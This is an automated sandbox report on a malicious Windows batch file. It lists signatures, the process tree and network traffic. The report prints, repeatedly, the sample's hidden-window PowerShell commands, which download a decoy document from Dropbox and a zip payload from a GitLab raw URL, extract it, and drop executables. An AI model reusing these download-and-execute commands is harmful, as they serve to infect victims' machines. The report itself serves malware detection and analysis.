Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
18cut04.bat

Overview

General Information

Sample name:18cut04.bat
Analysis ID:1557409
MD5:063a08da4bdeef6cc43e5041f5db4ee5
SHA1:469e79f961d6a5b205247b0cd3fbb72e0b8a4728
SHA256:bdaa1a95ab24bc377cf918933934d852e74835d710fde085ec51c62e65311ea0
Tags:batBraodouser-JAMESWT_MHT
Infos:

Detection

Abobus Obfuscator
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Abobus Obfuscator
Yara detected Powershell download and execute
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains functionality to detect virtual machines (STR)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 7672 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\18cut04.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 7772 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)
    • cmd.exe (PID: 7788 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • find.exe (PID: 7808 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • findstr.exe (PID: 7832 cmdline: fiNdstr /L /I set "C:\Users\user\Desktop\18cut04.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 7848 cmdline: fiNdstr /L /I goto "C:\Users\user\Desktop\18cut04.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 7860 cmdline: fiNdstr /L /I echo "C:\Users\user\Desktop\18cut04.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 7884 cmdline: fiNdstr /L /I pause "C:\Users\user\Desktop\18cut04.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • find.exe (PID: 7924 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 7988 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 8180 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 2064 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/18Fukrun.zip', 'C:\Users\Public\Document.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 7684 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
18cut04.batJoeSecurity_AbobusObfuscatorYara detected Abobus ObfuscatorJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 7988JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 2064JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        SourceRuleDescriptionAuthorStrings
        amsi64_7988.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          amsi64_2064.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\18cut04.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7672, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 7988, ProcessName: powershell.exe
            Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7684, TargetFilename: C:\Users\Public\Document\Lib\ctypes\macholib\fetch_macholib.bat
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\18cut04.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7672, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 7988, ProcessName: powershell.exe
            Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2064, TargetFilename: C:\Users\Public\Document.zip
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7684, TargetFilename: C:\Users\Public\Document\python.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\18cut04.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7672, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 7988, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\18cut04.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7672, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 7988, ProcessName: powershell.exe
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\18cut04.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7672, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 7988, ProcessName: powershell.exe
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\18cut04.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7672, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 7988, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\18cut04.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7672, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 7988, ProcessName: powershell.exe
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_5d046f6a-6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\LICENSE.txtJump to behavior
            Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.7:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.7:49744 version: TLS 1.2
            Source: Binary string: *.pdbv source: powershell.exe, 0000000D.00000002.1401370832.000001876A252000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: pdb.Pdb(nosigint=True).runcall(f) source: test_zipimport_support.py.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000D.00000002.1401370832.000001876A28C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft.pdb source: powershell.exe, 0000000D.00000002.1400342987.000001876A0F2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: <tr class="row-even"><td><p>pdb.Pdb</p></td> source: audit_events.html.17.dr
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbal\T source: powershell.exe, 0000000D.00000002.1400342987.000001876A0F2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: <td><p><a class="reference internal" href="pdb.html#pdb.Pdb">[1]</a></p></td> source: audit_events.html.17.dr
            Source: Binary string: 6?ll\System.pdb source: powershell.exe, 0000000D.00000002.1379643388.0000018750022000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: (<a class="reference internal" href="pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">pdb.Pdb</span></code></a>) is an example.</p> source: bdb.html.17.dr
            Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000D.00000002.1401370832.000001876A278000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbft source: powershell.exe, 0000000D.00000002.1401370832.000001876A28C000.00000004.00000020.00020000.00000000.sdmp
            Source: global trafficHTTP traffic detected: GET /scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bose1511/mkt1511/-/raw/main/18Fukrun.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
            Source: Joe Sandbox ViewIP Address: 162.125.66.18 162.125.66.18
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: ipinfo.io
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bose1511/mkt1511/-/raw/main/18Fukrun.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
            Source: powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .0.1:*/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; font-src https://* data: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
            Source: unicode.html.17.drString found in binary or memory: <a class="reference external" href="https://www.youtube.com/watch?v=MijmeoH9LT4">discusses the history of Unicode and UTF-8</a> equals www.youtube.com (Youtube)
            Source: powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; font-src https://* data: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
